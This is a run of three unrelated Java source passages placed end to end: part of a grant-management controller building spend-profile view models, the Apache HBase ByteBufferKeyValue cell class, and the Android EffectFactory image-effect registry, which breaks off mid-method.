        return spendProfileService.markSpendProfileIncomplete(projectId, organisationId);
    }

    /**
     * Builds the single-organisation view model from an already-loaded project and table:
     * totals per category/month, completion and approval flags, and the viewer's relationship
     * to the organisation. The summary is omitted for LOAN competitions.
     */
    private ProjectSpendProfileViewModel buildSpendProfileViewModel(final ProjectResource projectResource, final Long organisationId, final SpendProfileTableResource spendProfileTableResource, final UserResource loggedInUser) {
        OrganisationResource organisationResource = organisationRestService.getOrganisationById(organisationId).getSuccess();
        CompetitionResource competition = competitionRestService.getCompetitionById(projectResource.getCompetition()).getSuccess();
        SpendProfileSummaryModel summary = null;
        if (!competition.getFundingType().equals(LOAN)) {
            summary = spendProfileTableCalculator.createSpendProfileSummary(projectResource, spendProfileTableResource.getMonthlyCostsPerCategoryMap(), spendProfileTableResource.getMonths());
        }
        boolean isUsingJesFinances = competition.applicantShouldUseJesFinances(organisationResource.getOrganisationTypeEnum());
        Map<Long, BigDecimal> categoryToActualTotal = spendProfileTableCalculator.calculateRowTotal(spendProfileTableResource.getMonthlyCostsPerCategoryMap());
        List<BigDecimal> totalForEachMonth = spendProfileTableCalculator.calculateMonthlyTotals(spendProfileTableResource.getMonthlyCostsPerCategoryMap(), spendProfileTableResource.getMonths().size());
        BigDecimal totalOfAllActualTotals = spendProfileTableCalculator.calculateTotalOfAllActualTotals(spendProfileTableResource.getMonthlyCostsPerCategoryMap());
        BigDecimal totalOfAllEligibleTotals = spendProfileTableCalculator.calculateTotalOfAllEligibleTotals(spendProfileTableResource.getEligibleCostPerCategoryMap());
        boolean isUserPartOfThisOrganisation = isUserPartOfThisOrganisation(projectResource.getId(), organisationId, loggedInUser);
        boolean leadPartner = isUserPartOfLeadOrganisation(projectResource.getId(), loggedInUser);
        return new ProjectSpendProfileViewModel(projectResource,
                organisationResource,
                spendProfileTableResource,
                summary,
                spendProfileTableResource.getMarkedAsComplete(),
                categoryToActualTotal,
                totalForEachMonth,
                totalOfAllActualTotals,
                totalOfAllEligibleTotals,
                projectResource.getSpendProfileSubmittedDate() != null,
                spendProfileTableResource.getCostCategoryGroupMap(),
                spendProfileTableResource.getCostCategoryResourceMap(),
                isUsingJesFinances,
                isUserPartOfThisOrganisation,
                projectService.isProjectManager(loggedInUser.getId(), projectResource.getId()),
                isApproved(projectResource.getId()),
                leadPartner,
                competition.isKtp());
    }

    /** Convenience overload: loads the project and table before delegating above. */
    private ProjectSpendProfileViewModel buildSpendProfileViewModel(final Long projectId, final Long organisationId, final UserResource loggedInUser) {
        ProjectResource projectResource = projectService.getById(projectId);
        SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId);
        return buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser);
    }

    /**
     * Builds the project-wide summary view model: all partner organisations (lead first),
     * per-organisation review details, and overall approval/rejection status.
     */
    private ProjectSpendProfileProjectSummaryViewModel populateSpendProfileProjectManagerViewModel(final ProjectResource projectResource, final UserResource loggedInUser, final boolean isMonitoringOfficer) {
        final OrganisationResource leadOrganisation = projectService.getLeadOrganisation(projectResource.getId());
        // Sort partners alphabetically but force the lead organisation to the front.
        List<OrganisationResource> organisations = new PrioritySorting<>(projectService.getPartnerOrganisationsForProject(projectResource.getId()), leadOrganisation, OrganisationResource::getName).unwrap();
        Map<Long, OrganisationReviewDetails> editablePartners = getOrganisationReviewDetails(projectResource.getId(), organisations, loggedInUser);
        ProjectTeamStatusResource teamStatus = statusService.getProjectTeamStatus(projectResource.getId(), Optional.empty());
        return new ProjectSpendProfileProjectSummaryViewModel(projectResource.getId(),
                projectResource.getApplication(),
                projectResource.getName(),
                organisations,
                leadOrganisation,
                projectResource.getSpendProfileSubmittedDate() != null,
                editablePartners,
                isApproved(teamStatus),
                isRejected(teamStatus),
                isMonitoringOfficer,
                moSpendProfileJourneyUpdateEnabled,
                loggedInUser);
    }

    private boolean isApproved(final Long projectId) {
        ProjectTeamStatusResource teamStatus = statusService.getProjectTeamStatus(projectId, Optional.empty());
        return isApproved(teamStatus);
    }

    // Approval/rejection is derived from the lead partner's spend-profile status.
    private boolean isApproved(ProjectTeamStatusResource teamStatus) {
        return COMPLETE.equals(teamStatus.getLeadPartnerStatus().getSpendProfileStatus());
    }

    private boolean isRejected(ProjectTeamStatusResource teamStatus) {
        return LEAD_ACTION_REQUIRED.equals(teamStatus.getLeadPartnerStatus().getSpendProfileStatus());
    }

    /**
     * Per-organisation review details keyed by organisation id, preserving the incoming
     * (lead-first) order via LinkedHashMap; duplicate ids keep the first entry.
     */
    private Map<Long, OrganisationReviewDetails> getOrganisationReviewDetails(final Long projectId, List<OrganisationResource> partnerOrganisations, final UserResource loggedInUser) {
        return partnerOrganisations.stream().collect(Collectors.toMap(OrganisationResource::getId, o -> {
            Optional<SpendProfileResource> spendProfileResource = spendProfileService.getSpendProfile(projectId, o.getId());
            return new OrganisationReviewDetails(o.getId(),
                    o.getName(),
                    spendProfileResource.map(SpendProfileResource::isMarkedAsComplete).orElse(false),
                    isUserPartOfThisOrganisation(projectId, o.getId(), loggedInUser),
                    true,
                    spendProfileResource.map(SpendProfileResource::getReviewedBy).orElse(null),
                    spendProfileResource.map(SpendProfileResource::getReviewedOn).orElse(null));
        }, (v1, v2) -> v1, LinkedHashMap::new));
    }

    // True when the user is a PROJECT_PARTNER member of the given organisation on this project.
    private boolean isUserPartOfThisOrganisation(final Long projectId, final Long organisationId, final UserResource loggedInUser) {
        List<ProjectUserResource> projectUsers = projectService.getProjectUsersForProject(projectId);
        Optional<ProjectUserResource> returnedProjectUser = simpleFindFirst(projectUsers, projectUserResource ->
                projectUserResource.getUser().equals(loggedInUser.getId())
                        && projectUserResource.getOrganisation().equals(organisationId)
                        && ProjectParticipantRole.PROJECT_PARTNER == projectUserResource.getRole()
        );
        return returnedProjectUser.isPresent();
    }

    private boolean isUserPartOfLeadOrganisation(final Long projectId, final UserResource loggedInUser) {
        return projectService.getLeadPartners(projectId).stream().anyMatch(pu -> pu.isUser(loggedInUser.getId()));
    }
}
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.hadoop.hbase;

import java.io.IOException;
import java.io.OutputStream;
import java.nio.ByteBuffer;

import org.apache.hadoop.hbase.util.ByteBufferUtils;
import org.apache.hadoop.hbase.util.Bytes;
import org.apache.hadoop.hbase.util.ClassSize;
import org.apache.yetus.audience.InterfaceAudience;

import org.apache.hbase.thirdparty.com.google.common.annotations.VisibleForTesting;

/**
 * This Cell is an implementation of {@link ByteBufferExtendedCell} where the data resides in
 * off heap/ on heap ByteBuffer
 */
@InterfaceAudience.Private
public class ByteBufferKeyValue extends ByteBufferExtendedCell {

  // Backing buffer and the window [offset, offset + length) holding this cell's
  // serialized KeyValue bytes. The buffer is never copied; all accessors compute
  // positions into it.
  protected final ByteBuffer buf;
  protected final int offset;
  protected final int length;
  // MVCC sequence id; kept outside the serialized bytes.
  private long seqId = 0;

  // Shallow heap footprint of this object itself (not the buffer contents).
  public static final int FIXED_OVERHEAD = ClassSize.OBJECT + ClassSize.REFERENCE
      + (2 * Bytes.SIZEOF_INT) + Bytes.SIZEOF_LONG;

  public ByteBufferKeyValue(ByteBuffer buf, int offset, int length, long seqId) {
    this.buf = buf;
    this.offset = offset;
    this.length = length;
    this.seqId = seqId;
  }

  public ByteBufferKeyValue(ByteBuffer buf, int offset, int length) {
    this.buf = buf;
    this.offset = offset;
    this.length = length;
  }

  @VisibleForTesting
  public ByteBuffer getBuffer() {
    return this.buf;
  }

  @VisibleForTesting
  public int getOffset() {
    return this.offset;
  }

  // The get*Array accessors materialize copies via CellUtil; the corresponding
  // offsets into those fresh arrays are therefore always 0.
  @Override
  public byte[] getRowArray() {
    return CellUtil.cloneRow(this);
  }

  @Override
  public int getRowOffset() {
    return 0;
  }

  @Override
  public short getRowLength() {
    // Row length is stored as a short at ROW_OFFSET within the serialized cell.
    return ByteBufferUtils.toShort(this.buf, this.offset + KeyValue.ROW_OFFSET);
  }

  @Override
  public byte[] getFamilyArray() {
    return CellUtil.cloneFamily(this);
  }

  @Override
  public int getFamilyOffset() {
    return 0;
  }

  @Override
  public byte getFamilyLength() {
    return getFamilyLength(getFamilyLengthPosition());
  }

  int getFamilyLengthPosition() {
    return getFamilyLengthPosition(getRowLength());
  }

  // Family length (a single byte) sits immediately after the row bytes.
  int getFamilyLengthPosition(int rowLength) {
    return this.offset + KeyValue.ROW_KEY_OFFSET + rowLength;
  }

  byte getFamilyLength(int famLenPos) {
    return ByteBufferUtils.toByte(this.buf, famLenPos);
  }

  @Override
  public byte[] getQualifierArray() {
    return CellUtil.cloneQualifier(this);
  }

  @Override
  public int getQualifierOffset() {
    return 0;
  }

  @Override
  public int getQualifierLength() {
    return getQualifierLength(getKeyLength(), getRowLength(), getFamilyLength());
  }

  // Qualifier length = key length minus everything else in the key (row, family,
  // timestamp, type) as computed by KeyValue.getKeyDataStructureSize.
  int getQualifierLength(int keyLength, int rlength, int flength) {
    return keyLength - (int) KeyValue.getKeyDataStructureSize(rlength, flength, 0);
  }

  @Override
  public long getTimestamp() {
    return getTimestamp(getKeyLength());
  }

  long getTimestamp(int keyLength) {
    int offset = getTimestampOffset(keyLength);
    return ByteBufferUtils.toLong(this.buf, offset);
  }

  // Key length is the first int of the serialized form.
  int getKeyLength() {
    return ByteBufferUtils.toInt(this.buf, this.offset);
  }

  // Timestamp (a long) directly precedes the trailing type byte of the key.
  private int getTimestampOffset(int keyLen) {
    return this.offset + KeyValue.ROW_OFFSET + keyLen - KeyValue.TIMESTAMP_TYPE_SIZE;
  }

  @Override
  public byte getTypeByte() {
    return getTypeByte(getKeyLength());
  }

  // Type byte is the last byte of the key portion.
  byte getTypeByte(int keyLen) {
    return ByteBufferUtils.toByte(this.buf, this.offset + keyLen - 1 + KeyValue.ROW_OFFSET);
  }

  @Override
  public long getSequenceId() {
    return this.seqId;
  }

  @Override
  public void setSequenceId(long seqId) {
    this.seqId = seqId;
  }

  @Override
  public byte[] getValueArray() {
    return CellUtil.cloneValue(this);
  }

  @Override
  public int getValueOffset() {
    return 0;
  }

  @Override
  public int getValueLength() {
    // Value length is the second int of the serialized form.
    return ByteBufferUtils.toInt(this.buf, this.offset + Bytes.SIZEOF_INT);
  }

  @Override
  public byte[] getTagsArray() {
    return CellUtil.cloneTags(this);
  }

  @Override
  public int getTagsOffset() {
    return 0;
  }

  @Override
  public int getTagsLength() {
    int tagsLen = this.length - (getKeyLength() + getValueLength()
        + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE);
    if (tagsLen > 0) {
      // There are some Tag bytes in the byte[]. So reduce 2 bytes which is
      // added to denote the tags
      // length
      tagsLen -= KeyValue.TAGS_LENGTH_SIZE;
    }
    return tagsLen;
  }

  @Override
  public ByteBuffer getRowByteBuffer() {
    return this.buf;
  }

  @Override
  public int getRowPosition() {
    return this.offset + KeyValue.ROW_KEY_OFFSET;
  }

  @Override
  public ByteBuffer getFamilyByteBuffer() {
    return this.buf;
  }

  @Override
  public int getFamilyPosition() {
    return getFamilyPosition(getFamilyLengthPosition());
  }

  // Family bytes start right after the one-byte family length.
  public int getFamilyPosition(int familyLengthPosition) {
    return familyLengthPosition + Bytes.SIZEOF_BYTE;
  }

  @Override
  public ByteBuffer getQualifierByteBuffer() {
    return this.buf;
  }

  @Override
  public int getQualifierPosition() {
    return getQualifierPosition(getFamilyPosition(), getFamilyLength());
  }

  int getQualifierPosition(int familyPosition, int familyLength) {
    return familyPosition + familyLength;
  }

  @Override
  public ByteBuffer getValueByteBuffer() {
    return this.buf;
  }

  @Override
  public int getValuePosition() {
    return this.offset + KeyValue.ROW_OFFSET + getKeyLength();
  }

  @Override
  public ByteBuffer getTagsByteBuffer() {
    return this.buf;
  }

  @Override
  public int getTagsPosition() {
    int tagsLen = getTagsLength();
    if (tagsLen == 0) {
      return this.offset + this.length;
    }
    // Tags occupy the trailing tagsLen bytes of the cell.
    return this.offset + this.length - tagsLen;
  }

  @Override
  public long heapSize() {
    if (this.buf.hasArray()) {
      return ClassSize.align(FIXED_OVERHEAD + length);
    }
    return ClassSize.align(FIXED_OVERHEAD) + this.getSerializedSize();
  }

  @Override
  public int write(OutputStream out, boolean withTags) throws IOException {
    // NOTE(review): local 'length' intentionally shadows the field — it may be
    // shorter than this.length when withTags is false.
    int length = getSerializedSize(withTags);
    ByteBufferUtils.copyBufferToStream(out, this.buf, this.offset, length);
    return length;
  }

  @Override
  public int getSerializedSize(boolean withTags) {
    if (withTags) {
      return this.length;
    }
    // Without tags: key + value plus the two leading length ints.
    return getKeyLength() + this.getValueLength() + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE;
  }

  @Override
  public int getSerializedSize() {
    return this.length;
  }

  @Override
  public void write(ByteBuffer buf, int offset) {
    ByteBufferUtils.copyFromBufferToBuffer(this.buf, buf, this.offset, offset, this.length);
  }

  @Override
  public String toString() {
    return CellUtil.toString(this, true);
  }

  // Mutates the timestamp in place within the backing buffer.
  @Override
  public void setTimestamp(long ts) throws IOException {
    ByteBufferUtils.copyFromArrayToBuffer(this.buf, this.getTimestampOffset(), Bytes.toBytes(ts),
        0, Bytes.SIZEOF_LONG);
  }

  private int getTimestampOffset() {
    return this.offset + KeyValue.KEYVALUE_INFRASTRUCTURE_SIZE + getKeyLength()
        - KeyValue.TIMESTAMP_TYPE_SIZE;
  }

  @Override
  public void setTimestamp(byte[] ts) throws IOException {
    ByteBufferUtils.copyFromArrayToBuffer(this.buf, this.getTimestampOffset(), ts, 0,
        Bytes.SIZEOF_LONG);
  }

  // Deep copy into an on-heap KeyValue, preserving the sequence id.
  @Override
  public ExtendedCell deepClone() {
    byte[] copy = new byte[this.length];
    ByteBufferUtils.copyFromBufferToArray(copy, this.buf, this.offset, 0, this.length);
    KeyValue kv = new KeyValue(copy, 0, copy.length);
    kv.setSequenceId(this.getSequenceId());
    return kv;
  }

  /**
   * Needed doing 'contains' on List. Only compares the key portion, not the value.
   */
  @Override
  public boolean equals(Object other) {
    if (!(other instanceof Cell)) {
      return false;
    }
    return CellUtil.equals(this, (Cell) other);
  }

  /**
   * In line with {@link #equals(Object)}, only uses the key portion, not the value.
   */
  @Override
  public int hashCode() {
    return calculateHashForKey(this);
  }

  // Standard 31-multiplier hash over row, family, qualifier, timestamp and type —
  // mirrors the key-only equality above.
  private int calculateHashForKey(ByteBufferExtendedCell cell) {
    int rowHash = ByteBufferUtils.hashCode(cell.getRowByteBuffer(), cell.getRowPosition(),
        cell.getRowLength());
    int familyHash = ByteBufferUtils.hashCode(cell.getFamilyByteBuffer(), cell.getFamilyPosition(),
        cell.getFamilyLength());
    int qualifierHash = ByteBufferUtils.hashCode(cell.getQualifierByteBuffer(),
        cell.getQualifierPosition(), cell.getQualifierLength());
    int hash = 31 * rowHash + familyHash;
    hash = 31 * hash + qualifierHash;
    hash = 31 * hash + (int) cell.getTimestamp();
    hash = 31 * hash + cell.getTypeByte();
    return hash;
  }
}
/*
 * Copyright (C) 2011 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package android.media.effect;

import java.lang.reflect.Constructor;

/**
 * <p>The EffectFactory class defines the list of available Effects, and provides functionality to
 * inspect and instantiate them. Some effects may not be available on all platforms, so before
 * creating a certain effect, the application should confirm that the effect is supported on this
 * platform by calling {@link #isEffectSupported(String)}.</p>
 */
public class EffectFactory {

    /** Context that every effect created by this factory is bound to. */
    private final EffectContext mEffectContext;

    /**
     * Packages searched, in order, when resolving an effect name to a class. The trailing
     * empty entry allows callers to pass a fully-qualified class name directly.
     */
    private final static String[] EFFECT_PACKAGES = {
        "android.media.effect.effects.",  // Default effect package
        ""                                // Allows specifying full class path
    };

    /** List of Effects */

    /**
     * <p>Copies the input texture to the output.</p>
     * <p>Available parameters: None</p>
     * @hide
     */
    public final static String EFFECT_IDENTITY = "IdentityEffect";

    /**
     * <p>Adjusts the brightness of the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>brightness</code></td>
     *     <td>The brightness multiplier.</td>
     *     <td>Positive float. 1.0 means no change; larger values will increase brightness.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_BRIGHTNESS =
            "android.media.effect.effects.BrightnessEffect";

    /**
     * <p>Adjusts the contrast of the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>contrast</code></td>
     *     <td>The contrast multiplier.</td>
     *     <td>Float. 1.0 means no change; larger values will increase contrast.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_CONTRAST =
            "android.media.effect.effects.ContrastEffect";

    /**
     * <p>Applies a fisheye lens distortion to the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The scale of the distortion.</td>
     *     <td>Float, between 0 and 1. Zero means no distortion.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_FISHEYE =
            "android.media.effect.effects.FisheyeEffect";

    /**
     * <p>Replaces the background of the input frames with frames from a
     * selected video. Requires an initial learning period with only the
     * background visible before the effect becomes active. The effect will wait
     * until it does not see any motion in the scene before learning the
     * background and starting the effect.</p>
     *
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>source</code></td>
     *     <td>A URI for the background video to use. This parameter must be
     *         supplied before calling apply() for the first time.</td>
     *     <td>String, such as from
     *         {@link android.net.Uri#toString Uri.toString()}</td>
     * </tr>
     * </table>
     *
     * <p>If the update listener is set for this effect using
     * {@link Effect#setUpdateListener}, it will be called when the effect has
     * finished learning the background, with a null value for the info
     * parameter.</p>
     */
    public final static String EFFECT_BACKDROPPER =
            "android.media.effect.effects.BackDropperEffect";

    /**
     * <p>Attempts to auto-fix the image based on histogram equalization.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The scale of the adjustment.</td>
     *     <td>Float, between 0 and 1. Zero means no adjustment, while 1 indicates the maximum
     *         amount of adjustment.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_AUTOFIX =
            "android.media.effect.effects.AutoFixEffect";

    /**
     * <p>Adjusts the range of minimal and maximal color pixel intensities.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>black</code></td>
     *     <td>The value of the minimal pixel.</td>
     *     <td>Float, between 0 and 1.</td>
     * </tr>
     * <tr><td><code>white</code></td>
     *     <td>The value of the maximal pixel.</td>
     *     <td>Float, between 0 and 1.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_BLACKWHITE =
            "android.media.effect.effects.BlackWhiteEffect";

    /**
     * <p>Crops an upright rectangular area from the image. If the crop region falls outside of
     * the image bounds, the results are undefined.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>xorigin</code></td>
     *     <td>The origin's x-value.</td>
     *     <td>Integer, between 0 and width of the image.</td>
     * </tr>
     * <tr><td><code>yorigin</code></td>
     *     <td>The origin's y-value.</td>
     *     <td>Integer, between 0 and height of the image.</td>
     * </tr>
     * <tr><td><code>width</code></td>
     *     <td>The width of the cropped image.</td>
     *     <td>Integer, between 1 and the width of the image minus xorigin.</td>
     * </tr>
     * <tr><td><code>height</code></td>
     *     <td>The height of the cropped image.</td>
     *     <td>Integer, between 1 and the height of the image minus yorigin.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_CROP =
            "android.media.effect.effects.CropEffect";

    /**
     * <p>Applies a cross process effect on image, in which the red and green channels are
     * enhanced while the blue channel is restricted.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_CROSSPROCESS =
            "android.media.effect.effects.CrossProcessEffect";

    /**
     * <p>Applies black and white documentary style effect on image..</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_DOCUMENTARY =
            "android.media.effect.effects.DocumentaryEffect";

    /**
     * <p>Overlays a bitmap (with premultiplied alpha channel) onto the input image. The bitmap
     * is stretched to fit the input image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>bitmap</code></td>
     *     <td>The overlay bitmap.</td>
     *     <td>A non-null Bitmap instance.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_BITMAPOVERLAY =
            "android.media.effect.effects.BitmapOverlayEffect";

    /**
     * <p>Representation of photo using only two color tones.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>first_color</code></td>
     *     <td>The first color tone.</td>
     *     <td>Integer, representing an ARGB color with 8 bits per channel. May be created using
     *         {@link android.graphics.Color Color} class.</td>
     * </tr>
     * <tr><td><code>second_color</code></td>
     *     <td>The second color tone.</td>
     *     <td>Integer, representing an ARGB color with 8 bits per channel. May be created using
     *         {@link android.graphics.Color Color} class.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_DUOTONE =
            "android.media.effect.effects.DuotoneEffect";

    /**
     * <p>Applies back-light filling to the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>strength</code></td>
     *     <td>The strength of the backlight.</td>
     *     <td>Float, between 0 and 1. Zero means no change.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_FILLLIGHT =
            "android.media.effect.effects.FillLightEffect";

    /**
     * <p>Flips image vertically and/or horizontally.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>vertical</code></td>
     *     <td>Whether to flip image vertically.</td>
     *     <td>Boolean</td>
     * </tr>
     * <tr><td><code>horizontal</code></td>
     *     <td>Whether to flip image horizontally.</td>
     *     <td>Boolean</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_FLIP =
            "android.media.effect.effects.FlipEffect";

    /**
     * <p>Applies film grain effect to image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>strength</code></td>
     *     <td>The strength of the grain effect.</td>
     *     <td>Float, between 0 and 1. Zero means no change.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_GRAIN =
            "android.media.effect.effects.GrainEffect";

    /**
     * <p>Converts image to grayscale.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_GRAYSCALE =
            "android.media.effect.effects.GrayscaleEffect";

    /**
     * <p>Applies lomo-camera style effect to image.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_LOMOISH =
            "android.media.effect.effects.LomoishEffect";

    /**
     * <p>Inverts the image colors.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_NEGATIVE =
            "android.media.effect.effects.NegativeEffect";

    /**
     * <p>Applies posterization effect to image.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_POSTERIZE =
            "android.media.effect.effects.PosterizeEffect";

    /**
     * <p>Removes red eyes on specified region.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>centers</code></td>
     *     <td>Multiple center points (x, y) of the red eye regions.</td>
     *     <td>An array of floats, where (f[2*i], f[2*i+1]) specifies the center of the i'th eye.
     *         Coordinate values are expected to be normalized between 0 and 1.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_REDEYE =
            "android.media.effect.effects.RedEyeEffect";

    /**
     * <p>Rotates the image. The output frame size must be able to fit the rotated version of
     * the input image. Note that the rotation snaps to a the closest multiple of 90 degrees.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>angle</code></td>
     *     <td>The angle of rotation in degrees.</td>
     *     <td>Integer value. This will be rounded to the nearest multiple of 90.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_ROTATE =
            "android.media.effect.effects.RotateEffect";

    /**
     * <p>Adjusts color saturation of image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The scale of color saturation.</td>
     *     <td>Float, between -1 and 1. 0 means no change, while -1 indicates full desaturation,
     *         i.e. grayscale.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_SATURATE =
            "android.media.effect.effects.SaturateEffect";

    /**
     * <p>Converts image to sepia tone.</p>
     * <p>Available parameters: None</p>
     */
    public final static String EFFECT_SEPIA =
            "android.media.effect.effects.SepiaEffect";

    /**
     * <p>Sharpens the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The degree of sharpening.</td>
     *     <td>Float, between 0 and 1. 0 means no change.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_SHARPEN =
            "android.media.effect.effects.SharpenEffect";

    /**
     * <p>Rotates the image according to the specified angle, and crops the image so that no
     * non-image portions are visible.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>angle</code></td>
     *     <td>The angle of rotation.</td>
     *     <td>Float, between -45 and +45.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_STRAIGHTEN =
            "android.media.effect.effects.StraightenEffect";

    /**
     * <p>Adjusts color temperature of the image.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The value of color temperature.</td>
     *     <td>Float, between 0 and 1, with 0 indicating cool, and 1 indicating warm. A value of
     *         of 0.5 indicates no change.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_TEMPERATURE =
            "android.media.effect.effects.ColorTemperatureEffect";

    /**
     * <p>Tints the photo with specified color.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>tint</code></td>
     *     <td>The color of the tint.</td>
     *     <td>Integer, representing an ARGB color with 8 bits per channel. May be created using
     *         {@link android.graphics.Color Color} class.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_TINT =
            "android.media.effect.effects.TintEffect";

    /**
     * <p>Adds a vignette effect to image, i.e. fades away the outer image edges.</p>
     * <p>Available parameters:</p>
     * <table>
     * <tr><td>Parameter name</td><td>Meaning</td><td>Valid values</td></tr>
     * <tr><td><code>scale</code></td>
     *     <td>The scale of vignetting.</td>
     *     <td>Float, between 0 and 1. 0 means no change.</td>
     * </tr>
     * </table>
     */
    public final static String EFFECT_VIGNETTE =
            "android.media.effect.effects.VignetteEffect";

    /** Package-private: instances are created with the owning {@link EffectContext}. */
    EffectFactory(EffectContext effectContext) {
        mEffectContext = effectContext;
    }

    /**
     * Instantiate a new effect with the given effect name.
     *
     * <p>The effect's parameters will be set to their default values.</p>
     *
     * <p>Note that the EGL context associated with the current EffectContext need not be made
     * current when creating an effect. This allows the host application to instantiate effects
     * before any EGL context has become current.</p>
     *
     * @param effectName The name of the effect to create.
     * @return A new Effect instance.
     * @throws IllegalArgumentException if the effect with the specified name is not supported or
     *         not known.
     */
    public Effect createEffect(String effectName) {
        Class<?> effectClass = getEffectClassByName(effectName);
        if (effectClass == null) {
            throw new IllegalArgumentException("Cannot instantiate unknown effect '" +
                effectName + "'!");
        }
        return instantiateEffect(effectClass, effectName);
    }

    /**
     * Check if an effect is supported on this platform.
     *
     * <p>Some effects may only be available on certain platforms. Use this method before
     * instantiating an effect to make sure it is supported.</p>
     *
     * @param effectName The name of the effect.
     * @return true, if the effect is supported on this platform.
     * @throws IllegalArgumentException if the effect name is not known.
     */
    public static boolean isEffectSupported(String effectName) {
        return getEffectClassByName(effectName) != null;
    }

    /**
     * Resolves an effect name to a loaded class by trying each entry of
     * {@link #EFFECT_PACKAGES} as a prefix.
     *
     * @param className simple or fully-qualified effect class name
     * @return the first matching class, or {@code null} if none was found
     */
    private static Class<?> getEffectClassByName(String className) {
        // Get context's classloader; otherwise cannot load non-framework effects
        ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();

        // Look for the class in the imported packages; the first hit wins.
        for (String packageName : EFFECT_PACKAGES) {
            try {
                return contextClassLoader.loadClass(packageName + className);
            } catch (ClassNotFoundException e) {
